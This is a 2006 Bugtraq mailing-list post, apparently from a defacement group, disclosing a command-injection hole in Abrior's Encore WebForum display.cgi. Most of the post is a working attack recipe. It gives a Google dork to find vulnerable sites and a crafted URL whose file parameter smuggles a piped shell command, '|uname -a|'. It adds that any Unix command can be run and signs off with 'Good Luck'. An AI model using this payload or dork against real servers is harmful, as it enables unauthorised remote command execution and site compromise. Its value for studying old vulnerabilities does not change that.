[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
display.cgi
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: display.cgi
- From: soltan_defacer@xxxxxxxxx
- Date: 20 Jun 2006 09:28:03 -0000
#################### Azhteam Digital Security Team ######################
##############################################
Abrior's Encore WebForum ( display.cgi )
Find by : soltan_defacer
www.azhteam.com
# Greetings; s.defacer - azhteam - lvl3hr - edi.programe
##############################################
Bugs File : /forumcgi/display.cgi?
Display : http://www.target.com/encore/forumcgi/display.cgi?
1. search in Google --> allinurl:forumcgi/display.cgi?
2. Get the target site like -->
http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp
3. and now go to the exploit with insert this code :
&page=anonymous&file=|uname%20-a|
4. Full Display like :
http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname%20-a|
5. Linux or Unix command available in here... Good Luck :P~
#################### Azhteam Digital Security Team ######################